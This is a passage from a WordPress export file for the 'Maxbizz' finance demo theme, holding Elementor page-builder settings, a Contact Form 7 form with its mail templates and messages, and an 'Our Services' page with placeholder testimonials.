0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":40,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"bbe4b35","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"8c33540","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/hourglass.svg","id":1872},"library":"svg"},"title":"Business Consulting","des":"It is almost impossible to make strategic decisions without deep knowledge","btn_text":"","is_line":"","box_padding":{"unit":"px","top":"50","right":"25","bottom":"42","left":"25","isLinked":false},"bg_hover_icon_bg":"#FFFFFF1A","hover_icon_shadow_box_shadow_type":"yes","hover_icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.15)"},"bg_hover_title_color":"#FFFFFF","bg_hover_des_color":"#CCCCCC","is_border":"","icon_space":{"unit":"px","size":26,"sizes":[]},"icon_size":{"unit":"px","size":38,"sizes":[]},"icon_bg_width":{"unit":"px","size":70,"sizes":[]},"radius_box":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"icon_bg":"#FFFFFF","icon_shadow_box_shadow_type":"yes","icon_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":13,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"title_color":"#0B2A41","title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":20,"sizes":[]},"title_typography_font_weight":"600","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":16,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true},{"id":"82fa562","elType":"widget","settings":{"title":"Progress Bars","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"37788eb","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"5249351","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a17e202","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"},{"id":"7213754","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"},{"id":"173ab3c","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"lbar_color":"","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e4501d0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"content_position":"center","align":"space-evenly","_ot_content_align":"horizontal"},"elements":[{"id":"6e13157","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"},{"id":"712f4c6","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"bar_color":"#52C5B6","title_typography_typography":"custom","title_typography_font_family":"Inter"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"a0928a2","elType":"widget","settings":{"title":"Pricing Tables","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"4b24f46","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3254d38","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"01efe9e","elType":"widget","settings":{"title":"basic plan","price":"<sup>$<\/sup> 699","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li>Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"16a9414","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"15b3e04","elType":"widget","settings":{"is_featured":"yes","title":"ultra plan","price":"<sup>$<\/sup> 799","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li>Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true},{"id":"26f11eb","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"25be18a","elType":"widget","settings":{"title":"pro plan","price":"<sup>$<\/sup> 899","price_for":"month","short_text":"Discover the emerging technologies most relevant to your strategy by working.","details":"<ul><li class=\"active\">Support Your Business<\/li><li class=\"active\">Revoke Dokument Access<\/li><li class=\"active\">Detailed Risk Profiling<\/li>\n<li class=\"active\">Enter Unlimited Bils<\/li>\n<li class=\"active\">Bank Transactions<\/li>\n<li class=\"active\">Financial Strategy\n<\/li><\/ul>","label_link":"Choose Plane","price_typography_typography":"custom","price_typography_font_family":"Open Sans"},"elements":[],"widgetType":"ipricingtable"}],"isInner":true}],"isInner":true},{"id":"d184df3","elType":"widget","settings":{"title":"Flip Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"0457628","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"70","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"08202ed","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a0f08f5","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box1.jpg","id":533},"number":"01","title":"Client Learning Programs","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"0ed39b4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"a2601a1","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box2.jpg","id":534},"number":"02","title":"Partnership Ecosystem","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iflip_box"}],"isInner":true},{"id":"ec866a8","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"77a09fc","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/flip-box3.jpg","id":535},"number":"03","title":"New Business Innovation","des":"Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.","label_link":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More"},"elements":[],"widgetType":"iflip_box"}],"isInner":true}],"isInner":true},{"id":"23a755c","elType":"widget","settings":{"title":"Service Boxes","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"611b0b8","elType":"section","settings":{"gap":"extended","structure":"30","layout":"full_width"},"elements":[{"id":"38c3fac","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"b22c2fd","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"title":"Marketing Research","des":"Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"9039823","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f7959fa","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box2.jpg","id":903},"title":"Organizational Audit","des":"Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.","label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true},{"id":"87c6b1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"%","top":"0","right":"25","bottom":"0","left":"25","isLinked":false},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"417a646","elType":"widget","settings":{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box3.jpg","id":904},"title":"Business Consulting","des":"Successful experience of experts in structuring investment projects, developing and implementing.","label_link":"Explore More","box_bg":"#FFFFFF","radius_box":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"iimage_box"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_status]]></wp:meta_key>
		<wp:meta_value><![CDATA[publish]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_trash_meta_time]]></wp:meta_key>
		<wp:meta_value><![CDATA[1609414419]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_desired_post_slug]]></wp:meta_key>
		<wp:meta_value><![CDATA[elements]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Single Team Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/?post_type=wpcf7_contact_form&#038;p=736</link>
		<pubDate>Thu, 10 Sep 2020 08:20:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=wpcf7_contact_form&#038;p=736</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn wpcf7-submit">Send a message</button>
</div>
1
Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
support@oceanthemes.net
From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: [your-email]




Maxbizz "[your-subject]"
Maxbizz <wordpress@wpdemo.archiwp.com>
[your-email]
Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)
Reply-To: support@oceanthemes.net



Thank you for your message. It has been sent.
There was an error trying to send your message. Please try again later.
One or more fields have an error. Please check and try again.
There was an error trying to send your message. Please try again later.
You must accept the terms and conditions before sending your message.
The field is required.
The field is too long.
The field is too short.
The date format is incorrect.
The date is before the earliest one allowed.
The date is after the latest one allowed.
There was an unknown error uploading the file.
You are not allowed to upload files of this type.
The file is too big.
There was an error uploading the file.
The number format is invalid.
The number is smaller than the minimum allowed.
The number is larger than the maximum allowed.
The answer to the quiz is incorrect.
The e-mail address entered is invalid.
The URL is invalid.
The telephone number is invalid.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>736</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 08:20:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 08:20:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[single-team-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[wpcf7_contact_form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_form]]></wp:meta_key>
		<wp:meta_value><![CDATA[<div class="main-form">
<h4>Contact Me</h4>
<div class="row">
<p class="col-md-6">[text* your-name placeholder "Your Name *"]</p>
<p class="col-md-6">[email* your-email placeholder "Your Email *"]</p>
</div>
<p>[text your-site placeholder "Website"]</p>
<p>[textarea your-message placeholder "Message..."]</p>
<button type="submit" class="octf-btn wpcf7-submit">Send a message</button>
</div>]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:1;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:23:"support@oceanthemes.net";s:4:"body";s:179:"From: [your-name] <[your-email]>
Subject: [your-subject]

Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_mail_2]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:6:"active";b:0;s:7:"subject";s:24:"Maxbizz "[your-subject]"";s:6:"sender";s:38:"Maxbizz <wordpress@wpdemo.archiwp.com>";s:9:"recipient";s:12:"[your-email]";s:4:"body";s:121:"Message Body:
[your-message]

-- 
This e-mail was sent from a contact form on Maxbizz (http://wpdemo.archiwp.com/maxbizz)";s:18:"additional_headers";s:33:"Reply-To: support@oceanthemes.net";s:11:"attachments";s:0:"";s:8:"use_html";b:0;s:13:"exclude_blank";b:0;}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_messages]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:22:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";s:12:"invalid_date";s:29:"The date format is incorrect.";s:14:"date_too_early";s:44:"The date is before the earliest one allowed.";s:13:"date_too_late";s:41:"The date is after the latest one allowed.";s:13:"upload_failed";s:46:"There was an unknown error uploading the file.";s:24:"upload_file_type_invalid";s:49:"You are not allowed to upload files of this type.";s:21:"upload_file_too_large";s:20:"The file is too big.";s:23:"upload_failed_php_error";s:38:"There was an error uploading the file.";s:14:"invalid_number";s:29:"The number format is invalid.";s:16:"number_too_small";s:47:"The number is smaller than the minimum allowed.";s:16:"number_too_large";s:46:"The number is larger than the maximum allowed.";s:23:"quiz_answer_not_correct";s:36:"The answer to the quiz is incorrect.";s:13:"invalid_email";s:38:"The e-mail address entered is invalid.";s:11:"invalid_url";s:19:"The URL is invalid.";s:11:"invalid_tel";s:32:"The telephone number is invalid.";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_additional_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_locale]]></wp:meta_key>
		<wp:meta_value><![CDATA[en_US]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Our Services</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/our-services/</link>
		<pubDate>Fri, 11 Sep 2020 08:07:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=868</guid>
		<description></description>
		<content:encoded><![CDATA[Improve Your Business	        <h3>We Offer Great<br> Number of Finance Services</h3>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Marketing Research</a></h5>				<p>Analysis of the market as a whole and its particular components (competitors, consumers, product, etc.)</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/marketing-research/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box2.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box2-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit</a></h5>				<p>Analysis of internal processes & procedures, staff activity evaluation, evaluation of technologies.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box3.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box3-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Business Consulting</a></h5>				<p>Successful experience of experts in structuring investment projects, developing and implementing.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/business-consulting/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Project Management</a></h5>				<p>We are working in the format of an outsourcing project office. We assume operational coordination.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box5.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box5-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Support Functions</a></h5>				<p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">Explore More</a>	    
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/"><img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box6.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box6-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px" /></a>			
				<h5><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Finance Planning</a></h5>				<p>We identify the mission, goals and strategic priorities of a business project or non-profit organization.</p>			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">Explore More</a>	    
	        testimonials	        <h3>What People Say About Us</h3>	    
										“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”			
							<h6>Oliver Simson</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Mary Grey</h6>							client of company						
										"I am so happy, my dear friend, so absorbed in the exquisite sense of mere tranquil existence, that I neglect my talents. I should be incapable of drawing a single stroke at the present moment."			
							<h6>Samanta Fox</h6>							client of company						
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05-2.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06-2.svg" alt=""></figure></a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>868</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 08:07:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 08:07:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[our-services]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
